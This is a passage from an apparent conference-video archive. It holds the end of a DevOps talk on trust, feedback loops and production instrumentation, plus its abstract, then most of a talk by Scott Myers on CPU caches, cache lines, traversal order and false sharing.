doesn't work, go to the ultimate form of communication, pizza Food, humans are hardwired to like people they break bread with So one of the proofs I've got when a situation is really bad is not an organization is when they will not come to the lunch Because we're hardwired, if we eat with people, we're gonna like them more And so much about building great software and great systems is about trust Trust in the differences in the people, that they have different skills in you and they're valuable at it, that their job's hard too And you can't really grow trust inside of work Work is where you challenge trust, is where you exercise trust, is where you prove that you don't trust that guy How do you actually grow trust? And for the average work day, the only time that we can grow trust is at lunch Because it's the only time we're not at work, but it's still the work day If you're working with a group of people, and probably you are, or you're leading a group of people, plan your lunches They're the most valuable time you've got, they're the time when you can actually advance the little trust Now there are other opportunities if you want to build them, we've done after hours of exercise, just make sure the stuff that people actually relate to And trust falls are not one of them, right? Maybe it's World of Warcraft tournaments Whatever folks can relate to, that they can get to know each other, talk to each other more The powerful thing about code reviews is folks actually talking outside of actually doing the work So when it came to connecting with the ops guys, we had lunch with them Started understanding their sets of problems, they're having conversations now that they could get better When this starts to happen, and when things actually get better, the byproduct is that we go faster You just scrutinize the whole workflow and pick up the dumb things, pick up easy stuff like finally getting the build process where you wanted it Because you always wanted it there, we just haven't done it, right? There's things to do to actually get it there Things will go faster, and software gets better, and it'll point the way to the second way Folks ask me, when will I know it's time to go to the second way? When the next problem you have is we still don't know enough about the system The second way is about feedback, so the first way, we just went all the way through the flow And we saw the whole system, and what'll come from that, not only the easy things to clean, but as soon as the easy things are fixed, now we get to hard things How do we measure better to know to do better? There's two basic sets of measurements I care about, our development process, and our operations process Or how the software actually runs out in the wild So, culturally, I know I need more feedback, so I can understand everybody's concerns inside of the system Process-wise, it's how do I do it quickly, low cost, and super accurate, so it's short and loud The more I know, the better it gets, it just makes it easier to push through the first way again, that I understand more about the flow, and more about the flow, and more about the flow So a lot of this is about tooling, actually We people are using TFS, are we using TFS? For something other than source control Yeah, there's quite a few still, right? Actually using the work items, actually using the instrumentation on it, because it is instrumentation of our development process So back in the late 90s, early 2000s, when the dot-com boom was on, I figured out pretty quickly that I could build better quality software If when we did a deploy, and we ran a bunch of automated tests, if they failed, I could get back to the developer quickly And the faster I get back to them, the less time it took to fix it, why? Well, we already know it took them four hours to get there, right? Now once he does that click and deploy, right, or actually builds it, checks it in, and the build process goes on, the tests start to run What does a developer do next? The moment you complete the check-in, you stand up, you cheer, I am a god, and then you go get coffee, right? It's a normal ritual It's going to take you 10 minutes to get coffee If in those 10 minutes, I can run all of the tests and get back the mistakes you've made, the errors that exist When you sit back down here, coffee, you're like, huh? Oh yeah, you could see the error, you know what it is, because you haven't put the threads down yet If I'm taking an hour so that you're now checking Facebook, you're already forgetting, it'll take you three times longer to fix the code If it takes me a day to finish the test, I might as well give it to someone else, like, dude, I wrote that yesterday, what are we talking about? So speed became of the essence, I started getting real budget for testing infrastructure, because I could show consistently when we could get the errors back to the developer in less and less time, it took them less time to fix them, and that made better quality software The longer it took to catch the bugs and get them put in, that turned into fewer features got built, right? So that's why I learned to speak manager, managers care about budgets and deliverables, and so when I could show we iterate faster and how much it costs us to go to rate slower, I got money to fix those things, testing's never been cheaper than it is right now, so let's look at the cloud options that are out there But that's instrumenting our development environment, what about instrumenting our app? So today there are a ton of tools that allow us to actually instrument in production We're all using Visual Studio, 2010s, 2012s, 2013s, okay How many people know what preemptive analytics is? Not a one It's in the box, it's a production instrumentation tool, you already own it, the free version's got limitations, the commercial version costs money per dev I don't make anything off these guys, I just, the fact is, if you've never instrumented an app in production before, try this, you already own it It interlaces into your DLLs, you don't have to tell operations you did it, and it literally spit out what methods are calling, how long they're running for, how many times they get called, how many errors are occurring, it's a ton of info right away There are other ways to do instrumentation, preemptive analytics is just one of them App dynamics, New Relic, pick one The bigger thing here is, can we start measuring how our apps are actually being used, and there's two sets of measurements that I care about First is, errors that are actually occurring Okay, so if you're waiting for operations to write error reports for you, you are already in hell Right, the app crashes and they write a bug report, something along the lines of, the software didn't work You will ask for clarification, the software didn't work at all Getting ops to write good bug reports is hard, because they look at software very differently than we do, and so we end up arguing about the bug report and not the bug So automate it We're capturing production level errors, it raises an error inside of a server, captures that error, feed it back directly Preemptive analytics will create a TFS work item for you Operations, system center operations manner with AvaCode will create work items for you These are the actual errors occurred, and how many times they occurred, and what exactly it looked like, so you have the whole truth It becomes about the data, not the guys who submitted it, happens all the time And if you get into stuff like new relatives of ortho, instrument the individual clients, browsers, phones, you can get feedback from everything So you can actually see what's going on inside of your app in terms of errors Good tools will also tell you how people are actually using your app I used to advocate strongly for, as a developer, especially as a project lead, have access to the log files in production Although when you ask IT for that, they will say, no, because they heard I want access to the servers in production, and you do not want that, because then it could be your fault You want access to the log files, and the reality is every ops guy keeps all the log files They zip them up and store them on a server to be used as evidence against you You want those, right, you just want access to those, and then they will inevitably say, just tell me when you want them and I'll send them to you And that's when you add a recurring appointment every morning to ask for them And after about a week of asking for them every day, they will say, if I give you this username and password, will you please stop bothering me Because the log file is the source of the truth Now, the instrumentation is better, we can use stuff like preemptive and urella, it will tell us more about what's going on The big reason you want the log files is you know there's errors occurring, you just don't see them right now We wait until it actually takes the system out before we look at the log file and say, hey for three months it's been telling us, I'm gonna die, I'm gonna die And then it died, and we're all surprised For me, the big thing I did was about two months after we deployed the new version I'm studying the log files A to see if we're gonna die, and B to write a great report, that celebration report It says, hey, remember we were all at that new version eight weeks ago, here's how people are using it That's what we don't talk about, it's so much easier to have a party when you deploy software or when you just check it in Than it is to actually talk about how people use it The real reason the instrument in production is to know how people actually use your software, so you know when to throw the party And know what to celebrate, what matters, and you start setting metrics around We'll know we've done it well when this many people use the feature, or when we sell this much more stuff, or the average sale goes up this much Those are real metrics, that's what happens, we start getting real metrics about how our systems are being used We can actually know what to improve Another thing that happens in the second way, you start understanding that when operations have problems, sometimes they need dev resources Not to write code, but to provide insight, we called it cross-teaming So a senior dev would be available every weekend, if we got to a level three failure So you've gone through the script and you've restarted things, and now you're sort of at the place where we don't know how to make this work And it's still not working right, so in comes the experience developer And as experience developer, rule number one, during a crisis is do not write code, you will make it worse Ask me how I know, you will dig a deeper hole every time But you know how the software was built, you can understand a lot more of what's going on And the other thing that happened, two more things will come from that The second is, post-mortems get a lot more intelligent when there's both development and operations resources talking about a failure They both saw it live The number of times I've had development show up after the fact, and they said, the system did this, and the answer was, there's no way it could have done that, you misunderstood it Conversation over When both sets of eyes are in the room and have actually seen it fail, you can't argue that it actually happened Now we talk about how do we fix it So you get better root cause analysis Root cause analysis does not look like, be more careful next time That's not a good outcome, I want to not have to be careful at all, and the system stays up and keeps running And so now we get into, what do we really need the instrument with, how do we measure these things And good metrics are hard, if management is asking for metrics, they're probably vanity metrics Because managers want good news, right, so you give them a metric like total number of users Since we never delete a user, you're pretty sure that number is going to go up Right, which is a bad metric, a good metric is something that's actionable Not, if number of users is important to the organization, and maybe it is Then the real number that's interesting is the rate of increase Right, are we actually going up faster or going up slower? We're always going to go up because you don't delete users But the rate is going to matter, that delta is a more interesting number Total sales, kind of an interesting number, total sales month over month, more interesting number Rate of change, more interesting again And you'll notice as you start getting into these metrics, they're mostly business metrics And when you can get good at owning the numbers of how this company makes money or saves money You can get more budget for stuff that matters Because if you can't move the number, it doesn't matter But if you start understanding how to move the number, you can get it changed This process of going through second way, it's really more first way Going through first way makes you understand what you know and what you don't know And you want to know more You go through second way to know more and more and more and be able to react faster That's the outcome of getting to second way, and it opens the door to third way And third way is the synergistic effect I start changing the way I build software because I can move so quickly and I can measure effectively So because it's not a big deal to create software, because my testing infrastructure responds quickly to show What it looks like, the build process works every time, whole classes of bugs never occur anymore I can afford to experiment, it turns out writing software is pretty easy It's actually making sure the software works, that's hard So let's get better at that, and we can start to do more experimentation Because we only learn when stuff doesn't work The problem is we're living in organizations where failure is a disaster It's avoided all the time, and it turns out failure is the only time you learn anything So if we can mitigate the cost of failure, if we can move faster so we can recover from failure quickly Look, if you can only get me a build every 12 weeks as an ops guy I can't afford to have the system down, because it's going to take 12 weeks to fix it But you can give me a build every hour? I don't care, right? There's going to be another build coming in an hour, we can fix it, it's all right I don't have to worry about rolling back anymore, I can roll forward, because there's another build coming Now I've never gotten a 10 deploys a day with any customer, I've got one customer to four The reason we got to four is that we have marketing people And this was an e-commerce site, and they need to do A-B testing on ads Because they proved, with metrics, that when they put the right ad in front of the right customer It wasn't twice as good as the wrong ad, it was 20 times as good And that's a lot of money, and so they got to change ads several times a day But because we could only do the build process about every 12 weeks We had to cheat, we built a little CMS off the side of the site That would allow them to inject new ads onto the site Which meant about once a month marketing took the whole website down Because they're sticking the JavaScript and stuff into these ads And sure enough they're going to mangle the page every so often And the culture said, if you're adding code to the system, you're developing, period So it has to follow a process And how do they get to put code in the system without going through a testing process So we switched to four deploys a day So they could do an A-B test in the morning and an A-B test in the afternoon We just automated the build, it happened at the same time, every day, all the tests So they raced to get their ads in the right place at the right time, and if they broke it they could fix it And that changed when we started building software, because now with features We started calling integration first, you're building features but they're not visible to the customer And you add a dashboard so that the operations guy could turn that feature off If it's going to damage the system, they want to be able to shut it off And we start going through new testing approaches We're breaking things before production, we have consistency in environments We start using asserts so that we can misconfigure anything and catch it early You know that little bar that hangs in a parking lot that says 2.5 meters? If you hit that, you don't keep driving, right? It doesn't damage your car, but it lets you know, soon, something bad will happen, right? It's just a gate, it's an assert Now, some of us would think, hey, you should be smart enough to know how tall your car is The only thing that needs to be there is a sign that says 2.5 meters, right? And if you don't know, oh well, so you crush the top of your car and damage the building You should have known better, be more careful next time We hang the pole so that you don't have to think about it, bunk, you should stop You should do software the same way, that we have these gates that catch us early When we make mistakes that can be fixed, static analysis looks like this All of these things help add up to that ability We start fighting back on technical debt, if you make it visible, it will get fixed I started dedicating about a day a week to it, until it was gone, or nearly gone The big thing to actually fighting technical debt successfully is putting metrics around it Show that it makes or saves money and you will get it fixed, but you have to make it visible Until it's visible, you'll never fix it, it's just invisible Repairing technical debt is like performance tuning, nobody cares about it when it's done They just talk about that's the time when you didn't ship anything new Performance is just like air, there's air in this room and nobody cares about it If I took the air out of this room, you would care, but it's the same thing with technical debt Until it's visible, nobody's going to care about it And you also don't have to do the run-white way, we wrap it cycle, we can experiment The marketing guys got to figure it out, they AB test ads, why don't we AB test features? If you had that battle with a couple of experienced guys trying to find out the best way to write a particular feature Don't figure it out, write them both, try it Get metrics around it, get feedback from it, you've got the instrumentation now And you can actually make a better version of the product You start feeding features to the domain experts, to your requirements guys Based on how the software was actually used, not focus groups, because humans lie But actually how are people using the software, a whole different way of thinking about features You start being able to anticipate what the new features are going to be, what people actually need Where people are spending too much time, where they're having problems, stuff they like and stuff they don't like And that becomes really fun, software becomes an experiment, a laboratory That you're constantly trying to make better, and you have metrics to show when you are getting better You know when to throw the party In the end, this is all about just making better software, and really enjoying doing it You have this pride in building software that is really responsive to the business needs If you want to know more about this, here's five books I've listed them in order of what, the order you should buy them in And it turns out that it's by length too The top book, the Phoenix Project, this is Gene's Kim book It's written in a fictional style, don't read it for the love story Read it for the experience of taking a system that was in trouble and making it successful It's a quick read, and it's an inspirational piece really to start thinking in terms of that The next book on the list, the Lean Startup You do not need to be in a startup to read Eric Reese's book It's very popular in Silicon Valley right now, it's like that's the hotness these days Two things that are important in that book First is this concept of minimal viable product Once you have instrumentation in place, and you can see how people actually use your app You can start building stubs of features and seeing if anybody cares That's minimal viable product, Reese talks about it extensively But the biggest thing is in the middle of this book there's a chapter on Suppose you're not in a startup, suppose you're in a bigger organization but you want to move faster What do you do? Read that chapter, read the whole book, but that chapter is the one that will grab you If you're in a bigger organization and you're just looking at this going, I want this but how? How can I possibly talk anyone into it? That's a bunch of useful material around how to do that These three other books are the bigger, heavier ones Gene Kim's Visible Ops book is an operations oriented book It's useful to read just to understand how operations can be All Spaw's book on web operations, the web focused version of that same thing And it gets really into continuous delivery And continuous delivery book by Jez Humble, who was here last year Fantastic book on just how we as developers can deploy software more quickly with higher quality Folks, it's all the time I got, thank you so much for listening and I hope you have a great conference
DevOps is about making software better – by bringing everyone involved in software closer together, including (but not limited to): domain experts, architects, developers, designers, testers, security and operations. This session takes you through the DevOps culture, focusing on people, process and tools (in that order). You’ll learn how to get the conversation started between the teams, how to bring the teams closer together, and how to ultimately become one team (we’re all in this together)! Understanding DevOps is about focusing on what’s important: building and delivering the best software you can.
10.5446/50550 (DOI)
Okay. I'm Scott Myers. I want to talk about CPU caches and why you might want to care about them in the first place. So to build a certain degree of suspense into what we're talking about right here, usually I am in a situation where I can look back at the screen and sort of use my laser pointer and point at it, but if I try to do that I will literally fall to my death. So for those of you who find the talk particularly boring, bear in mind that at any moment I could die. So if that doesn't improve ratings, I don't know what will. I want to point out that a suitable way to express your appreciation for my failure to die or depending on your perspective, my dying would be to turn in a green card if I succeed one way or another. I want to talk about a couple of ways to traverse a raise. Now what I'm going to be showing here is a chunk of memory inside the machine. This is all about what's going on on the hardware. And before I go any further, how many people are working in a managed language? Okay, lots of people are working in a managed language. That's great. I have news for you. There is something below the virtual machine. There is the actual hardware. And the actual hardware does not care anything about what programming language you are using or whether it's running on top of a hypervisor or a supervisor or have some kind of abstract machine. The underlying hardware really has a very limited set of concerns. So let us suppose I have a chunk of memory which represents an array. And what I want to do is walk through that memory and maybe I want to add up the values in the entire matrix, let's say. Or maybe I want to count the number of odd values. The point is I want to traverse the matrix once looking at every individual element. And there's two ways I can do that. I can start on the first row and I can go row by row. That is known as a row major traversal. Or I can go column by column. That is known as a column major traversal. Both traversals touch exactly the same memory. They do exactly the same conceptual amount of work. If you write the code for these two kinds of traversals, you will find that the code is very similar for a row major or a column major traversal. It's basically a matter of when you have the nested for loops or the rows on the outside or the columns on the outside. So the code that is shown here happens to be C++ but it's going to look very, very similar in every other programming language. So basically the code on the top is showing you how a row major traversal works and the code in the else clause is showing how a column major traversal works and the red is showing you the difference between the two. So from a programming perspective, row major, column major, they touch the same chunks of memory. And in terms of writing the code, it's no more difficult to write one than the other. The source code looks about the same. So everything seems like it's, you know, about the same. What's interesting is the performance is not at all about the same. So what I did was I wrote a little benchmark here and what I was doing was plotting how much time it takes to simply traverse the matrix looking at every element exactly once as a function of the total size of the matrix. So if you look on the bottom, you see that the matrix starts with a size of zero and it goes up to 35 megabytes. Now, I did this with two compilers, happened to be Microsoft's compiler and the GCC compiler for C++. But again, you're going to get similar results in anything which is actually touched on the hardware. And what I want you to notice is that first we've got the sort of the magenta line that has that nice little bend in it. That's the brighter, higher line. That corresponds to a column major traversal. Now, what you can't see as well, but if you look very, very closely, there are little blue Xs next to most of those magenta data points. Those little blue Xs are for a different compiler. So basically we have two compilers. One of them is GCC, one of them is Microsoft's compiler. So independent people writing their own compiler, but you can see that the performance you're getting is about the same in both. Now, below that magenta line, you can see some look like dark black diamonds. It's a nice straight line and below that are some yellow triangles. Now, those both correspond to a column major traversal. Now, the first thing I want you to notice is those two lower lines down there, these two lines here, those are the row major traversal. They are much, much better than the column major traversal, regardless of the compiler. And the column major traversal here is bad compared to row major with both compilers. So this is not a compiler dependent phenomenon that we are looking on. Now, it turns out that the sort of the blueish black dots here, this happens to be for Microsoft's compiler and this happens to be for GCC's compiler. I do not want you to go, ah, I know what he's driving at, Microsoft's compiler sucks. That is not the conclusion I am asking you to come to. What I'm asking you to come to is the observation that a row major traversal with both compilers is noticeably faster than a column major traversal with either compiler, which strongly suggests that what we're looking at is a phenomenon that has to do with the underlying machine and not with how that code is compiled. So what we conclude is the traversal order matters. What's interesting is the question, well, why does it matter? We're touching the same amount of memory, but I'm not going to answer that question. I want to talk about something different for a moment. So Herb Sutter a number of years ago published an article where he wanted to find out the mac, excuse me, the number of odd elements in a square matrix. So this is some pseudocode that he put together. This is sequential pseudocode. So we have a square matrix. Each side has dim elements in it. So it's a dim by dim matrix. And what we want to do is figure out how many elements are odd numbers. So that's pretty straightforward here. What we just do is for, we go, we have a couple of nested loops and basically if the element we're looking at, modulo 2 is 0, then we increment the number of odds. So this will walk through that matrix, checking every element to see if it's odd. If so, it'll increment it. Works fine. However, if you have a very large matrix, gigabytes in size, for example, a very large matrix, then there's no reason to do it sequentially. You might as well do it in parallel. It's easy enough to break that matrix into a bunch of independent chunks and then have different threads look at different parts of the matrix and that should run a lot faster. So Herb wrote the following pseudocode. Now this happens to be pseudocode in pseudos C++. So if you don't know C++, trust me. And if you do know C++, I understand this is not real C++, blame Herb. But the important thing here is basically what we're doing is we're going to take this, take this matrix. And what I like to point out is you can tell the difference between somebody who publishes code that is supposed to be described orally and someone who publishes code that is only designed to be red. And one of the ways you can tell the difference is that you probably would not choose capital P and lowercase P if you were planning on talking about things orally. So I will attempt to convey this as follows. What we're going to do is we're going to assume that we have P workers and the individual one of those P workers will call P. As I said, this is what Herb is. So basically, if you take a look at the code, fundamentally what it's doing is it's taking the matrix, it's dividing it by the number of threads that we have. It's breaking it into a beginning point and an ending point for each one of those threads so they can operate on independent chunks of the matrix. It then spawns an individual thread for each one of the chunks. It has each one of the chunks look at its own section of the matrix, counts up the number of odd numbers, and then when they're all done, the threads get joined. And what is important to us here is we have an array here that has enough room for P elements. So every one of those threads is writing into its location in that array how many odd numbers it has found. So thread number eight will write into slot eight how many odd numbers it found on its portion of the matrix. And similarly for thread nine, ten, two, three, like that. And then after performing the join operation, so all the threads come together, so after performing all the join, we simply sequentially then add up all the numbers. And one of the reasons why I show Herb's data when talking about this particular problem is because Herb has access to a machine with 24 cores which makes me feel extremely inadequate. I don't have a machine with 24 cores. But what's cool about this is, so this is the scalability. So what we see here is this is how long it takes to get something done with one core. So if we double the number of cores, we give it twice as much computational horsepower. And it responds by immediately dropping by 42%. It's about half as fast. No problem. We have a 24 core machine. We will just keep adding more and more horsepower, which we do. And finally, when we get up to about, oh, 16, 17, 18 cores, we are back at 100% of the performance with one core. That's the kind of scalability result you want to show your managers. 15 times as many cores, it runs exactly as fast as when we only had one core. That's what we're really looking for. But that's okay. We have more core. Well, Herb has more cores. So we keep throwing more at it. And finally, we get up here. We finally peak at about 40% higher than a single core. But there's something distressing about showing, about throwing 20 times as much computational hardware at a problem and getting a 40% speedup on what is obviously an embarrassingly parallel problem. So we'd like to think that we could do a little better than that. So if we take the pseudo code for performing things in parallel and we make an extremely tiny change. Now, what we did before was we had an array of P elements where each one of the threads was going to write into the array how many values it found that were odd. We're still going to do that. However, what we're going to do is for each thread and this indentation level is in each individual thread, each individual thread is going to keep its own local counter of how many odd numbers it's found. It's initialized to zero. As it runs, it will then increment its local counter. And when it's finished with its portion of the matrix that it's supposed to look at, it's going to take its local counter, which it's then going to write into the location in that matrix. So the only difference is that instead of writing our results into the matrix as we go, we're going to keep track of them locally and then we're going to write them into the matrix, excuse me, into the array when we are done. That's the only difference. Conceptually, this can't change anything. I mean, the code is more complicated now. We're using an extra local variable. We're wasting memory. Well, it turns out this memory waste turns out to be worthwhile because now we get perfect scalability. That's kind of nice. Clearly, the access patterns that we get under multithreading makes a difference. But the question is why? And the answer has to do with CPU caches, which is the whole point of this talk here. CPU caches are small amounts of unusually fast memory. It's all caches. It's just unusually fast memory where unusually fast means faster than main memory. Also means more expensive or else we'd have it all over the place. That's what a CPU cache is. And the reason it's important for performance purposes is because the access latency is much smaller than it is for main memory. There are three common kinds of CPU caches. Hardware engineers are clever people. They come up with new kinds all the time. But fundamentally, on a day-to-day basis, the kinds of CPU caches you'll normally be dealing with are there's the data cache, also known as the D cache, and amongst the truly chic known as the D dollar sign. So that's the data cache. Stores data that's used by the program. There is the instruction cache, also known as the I cache or the I dollar sign. The instruction cache caches recently accessed instructions. And just when you thought that caches can be identified because they use the word cache in the name, we have the translation look-aside buffer, the TLB, which is also a cache. It just doesn't say so. And the TLB, and this is the only slide where I'm going to mention it, what it does is if you're running on a virtual memory system, you need to have a way to translate from the page, from the page value in your virtual address space into the page number of the physical memory page. And what the TLB does is it caches the most recent translation. So it's basically for doing quick look-ups of the result of a translation from your virtual memory page to your real memory page. And I'm not going to say anything more about TLBs from now on because it turns out that if you optimize for the data cache and the instruction cache, the TLB gets optimized at the same time. So that's the situation. If you read online commentary blogs and stuff from developers who work with caches, you come across some really interesting comments. So this is one from Sergey Solinik from Microsoft. So he talks about Linux was writing packets at about 30 megabits per second wired and wireless at about 20 at Linux. Windows CE was crawling at about 12 megabytes wired and six megabits per second wireless. Now let me put this in perspective for you. So what this comment is really saying is, so we work at Microsoft and all the power of Microsoft with all of the smart people and really powerful buildings was running at about half the speed of those open source weenies who work on Linux. From Microsoft's perspective, this is not a good thing. But he goes on, we found out that Windows CE had a lot more instruction cache mishes than Linux. So I want to point out this is talking about the instruction cache. And the reason I mention this is because usually when you hear about caching, it's almost always about the data cache. This is talking about the instruction cache, the forgotten cache that does in fact make a difference. So he goes after we change the routing algorithms to be more cache local. So they changed the way that they wrote the code so that it would work better with the underlying hardware. We started doing 35 megabits per second wired and 25 megabits per second wireless, 20% better than Linux and Microsoft live happily ever after. But the message I want you to take away is they had a performance problem and they rewrote the instructions to make better use of the instruction cache so it would work better with the hardware. Another quote, this one is from Dmitri Vukov. He did the Relacy Race Detector. I like this quote because this is a man with conviction and enthusiasm. Cache lines are the key. Exclamation mark. Undoubtedly, exclamation mark. If you will make even a single error in the data layout, you will get a 100 factor slower resolution, exclamation mark, and in case you think he's joking, no jokes, exclamation mark. That's about the data cache. That's not the instruction cache. He's talking about the data cache, different cache, different problem, still important. CPU caches are typically on modern hardware organized into cache hierarchies, what are usually known as multi-level caches. So to give you some specific numbers and talk about something specific, I'm going to be talking about a particular processor. It happens to be the Intel Core i7 900 series. And in case you are wondering why I chose this particular processor, it's because at the time I originally put these slides together, I was researching a new computer I was going to get. That's what's inside this thing, which these days can also be used as a weapon or a boat anchor. It's so big. But it's got a nice processor inside. So I want to point out, I want to talk a little bit about the characteristics of this particular processor, which is representative of lots of processors these days. So it has 32 kilobytes of 32 kilobytes. Remember kilobytes? Not megabytes, not giga kilobytes. That's how much memory it has in the level one cache, in particular the level one instruction cache. It has another 32 kilobytes of memory in the level one data cache. Now that's per core. This particular processor happens to have four cores. That 32 kilobytes level one instruction cache and that 32 kilobytes level one data cache is shared by two hardware threads. They basically compete for what goes into those two caches on this particular machine. After the level one cache, which is the, what the heck, I'll lie to you, it is the fastest memory in the machine, is the second fastest memory in the machine. That is the level two cache, the level two cache on this particular machine, 256 kilobytes of level two cache per core. However, it is shared for both instructions and data, and it's shared by two hardware threads. So it's quite a bit larger, but now we don't segregate instructions and data. Instead, they're sharing the same cache, and they're both used by two hardware threads. Finally, we get to the level three cache. Eight megabytes, megabytes, eight megabytes of level three cache holds instructions and data, but don't get too excited. It's shared by all four hardware cores, and that means eight hardware threads. So this is a picture. The caches are not drawn to scale. If you go back and look at the numbers, you're going to see that these don't match the scale, but this does show you basically what's going on here. So this particular machine, it's got four cores. Each core has two threads on it because it's using hyperthreading. Each one of those cores has a level one instruction cache, a level one data cache, which are independent. They share a level two cache. They share a level three cache with all the other cores. Oh, and by the way, in case you didn't remember, somewhere way off in the distance is main memory. There is actually main memory. That's where all those pesky gigabytes come in. Not that they do you any good, because if you are not running inside your cache hierarchy, you are waiting. I told you before that caches are small amounts of fast memory. I want to emphasize the part about caches being small. So let's assume I have a 100 megabyte program image, not terribly large, a 100 megabyte program image. That's code plus data. That means 8% of your entire image would fit into the level three cache on the particular machine that I'm talking about right here. But remember, that level three cache is shared by every process running on the machine, including the operating system. So the best you can possibly do is to get 8% of your program image in the level three cache, which remember is the slowest of the caches. That's not a lot. One quarter of 1% will fit into every level two cache. That's not much either. And a whopping three one hundredths of a percent will fit in each level one cache. Caches are small. That's important. There's not a lot of cache available. I said caches are small amounts of unusually fast memory. They're unusually fast compared to main memory. On this particular machine, the level one latency, you go to level one cache, is four cycles. Now I told you I was gonna lie and say it was the fastest memory on the machine. I feel guilty. I feel compelled to clarify that. The fastest memory on the machine are the registers. So the registers you can think of as level zero cache. But there's really not very many of those. But you can get to a register in one cycle. On this particular machine, going to level one cache costs you four cycles. So it's one fourth as fast. You go to level two cache, the latency is 11 cycles. It's about a third as fast as the level one. You go to the level three cache, it's 39 cycles. It's about one third as fast as the level two. If you go to main memory on this particular processor, it's 107 cycles, which means that it is 27 times slower than level one. And what's fun about this is if you run a profiler on your program to find out how busy things are, when a processor is waiting for data from memory, that is not considered an idle processor. It's considered to be busy with most CPU profilers. Which means it is entirely possible to have a machine that is idle 99% of the time that shows 100% CPU utilization. I like to give these kind of upbeat talks to put everybody in a really good mood. If you are interested in having programs that run quickly, if you're at all concerned about performance, forget all those gigabytes of memory. They don't count. The only thing that matters is cache. Everything else is so slow that it just doesn't make a difference. So in this particular case on this machine, we've got eight megabytes of fast memory. And remember, that includes the slow fast memory. Because everything else slows things down by orders of magnitude. Fundamentally, as far as the hardware is concerned, small is fast. You often hear about, well, you know, there's a time-space trade-off. You hear about time-space trade-offs when you go to school. The hardware did not go to school. The hardware is a souped-up toaster. The hardware thinks that small is fast and you're not going to convince it otherwise. This means, just with what we've talked about so far, compact code that is well localized, that tends to access the same instructions over and over and over, that fits in cache. So the loop fits entirely within your 32 kilobytes level one cache. That's fast. Anything else is slow. Compact data structures that are well localized and that fit in your cache will also be fastest. And data structure traversals that only touch cached data are going to be fastest. That's just dictated by the hardware. Caches aren't accessed the way normal memory is. Caches are accessed in terms of cache lines. So when you fetch an individual byte from main memory, conceptually you go, oh, I'm going to go and get a char, for example. You are not getting a char. What you are going to do on most modern machines is you're going to bring back a 64 byte cache line. It depends on the particular architecture you're working on, but that's pretty common. So on the Core i7, the processor I've been talking about, it has 64 byte cache lines. That seems to be very common these days for mainstream processors from Intel and from AMD. And to put things in perspective, that means that A cache line, that'll hold 16 32-bit values. So let's say 16 integers on a 32-bit machine, 16 elements of an array of int on a 32-bit machine, 8 64-bit values, so maybe eight floats or, excuse me, eight doubles. Main memory is read and written in terms of cache lines. If you ask for a single byte, you get a whole cache line. It keeps the bus busy. If you write a single byte, eventually that entire cache line, whatever cache line that contains that byte, is going to go back out to main memory. This becomes really important. You want to make sure, for example, if you go to the trouble to read in a cache line, you'd like to use the whole thing. If you go to the trouble to write out anything on a cache line, you'd like to write out more than one byte. This feeds into the notion of using compact data structures or using instructions which have as much stuff packed together as you can possibly get. So visually, to try to put things in perspective, this actually is to scale. That's a byte. That's 64 times as big. That's a cache line. So when you're programming with caches, you have to think in terms of cache lines rather than just thinking in terms of the individual elements of the cache. This explains, by the way, why a row major traversal is so much faster than a column major traversal. With a row major traversal, when I go to the first element of a row major traversal, then I'm going to go to the beginning of this cache line here. So, all right, maybe I twiddle my digital thumbs while I'm waiting for that cache line to be brought in. But once the cache line's there, I'm now walking down the hardware, picking up element after element. So I get one slow access and 60 some odd fast accesses. And then I get another slow one and then a whole bunch of fast ones. However, with a column major traversal, I bring in a cache line, read the first element. I then have to go to the next cache line, read another element. I go to the next cache line, read in the third element. So I get slow access, slow access, slow access, slow access. And in practice, what often happens is by the time you get down to the bottom here, it turns out that you couldn't fit all of these in your cache at the same time. So by the time you got down to these here, you started evicting the lines that were up on top, getting them out of the cache to make room for the lines that you needed, which means you can actually get a cache miss every single time you access something. This is the fast track to the slow lane. So that explains, just knowing how hardware works explains why it is that we got so much better performance with row major rather than column major traversals. It turns out the hardware, although dumb as a toaster, it's a fairly smart dumb toaster. So when you are making access to real memory addresses, the hardware is actually looking for trends. And when it begins to notice an access pattern, the simplest pattern would be, I'm walking down an array, element by element. But it could be, I'm walking down the array from the end to the beginning, element by element. It turns out the hardware knows about both directions. You can go forward, you can go backward. Hardware figures out, and it starts doing what's known as cache line prefetching. So with cache line prefetching, it's anticipating the cache lines you are likely to need in the future. And it starts bringing them into memory because who knows, you might need them. And it's even more sophisticated than that. For example, if you're reading every fifth element or every 12th element, it will begin to notice patterns doing that. And since you're probably running on a system with multi-threads, you personally may not be writing multi-threaded software, but you probably are. But something on the machine is probably running concurrently. There's probably an operating system running, for example. Turns out the hardware is smart enough to be able to track patterns by different threads and start doing prefetching for different threads all simultaneously. It's a brave little toaster. There are some implications of this behavior. Now, the first one is that locality is really important, in particular. If I have brought in some memory location A, some address A, because I either needed to read it or I needed to write it. That means that the other addresses near A are probably already in cache, either because they're on the same cache line, which means I brought them in when I brought in A itself, or possibly because they were prefetched because there was a pattern of accesses that the hardware was noticing, so it did some prefetching for me. Another implication, predictable access patterns count. So if you are walking through an array, for example, going through in some beginning to end, or end to beginning, those are the cache friendliest traversals, then the hardware is going to be able to pick up on it. On the other hand, if you have something like a linked data structure where you're following random pointers jumping around in memory, that is the equivalent of declaring war on the cache subsystem. It cannot predict what your next access is going to be, which means the prefetching is not working for you. You're probably jumping from cache line to cache line, and as a result, when you are trying to have the fastest possible data structures, you don't want a linked data structure. At the end of the day, the hardware is dumb, the only thing it knows about is an array. Arrays, good. Everything else, no idea what it means. This also means that a linear array traversal, usually from beginning to end, or from end to beginning, it doesn't really matter, is extremely cache friendly. It's got great locality, you're going from one element to the next, which means you're walking down a cache line. It's got a great set of patterns, which means that the hardware can figure out what you're doing and start prefetching for you. And what this means is that if I have a linear array, excuse me, if I have an array and I'm doing a linear search from beginning to end, that can be a lot faster in practice than a binary search, for example, on a sorted data structure, or I assume a heap-based data structure. If I have a sorted array and I do a look up inside the sorted array, which is log n, that can be faster than an O of 1 search, for example, of a heap-based hash table. Now, I want to point out that computer science is legitimate for a large enough amount of data than suddenly going from logarithmic lookup time to constant lookup time, constant lookup time is going to be faster. Talk to people who are dealing with large amounts of data, Google, Facebook, the NSA, all these places that are dealing with a large amount of data. By the way, I'd like to personally apologize for Google and Facebook. So people working on that amount of data, they have bigger, they literally have bigger problems to solve. All of them, you have to take this stuff into account at some level anyway. But as I like to put it, at the end of the day, big O is going to win, but hardware caching takes an early lead. So for more moderate amounts of data, the hardware makes a big difference. Now, on modern hardware, it is very common to have multiple cores in one processor. So I told you before that on the particular processor inside this machine, the Core i7 architecture, there's four cores. So let's suppose I've got a four core machine, and 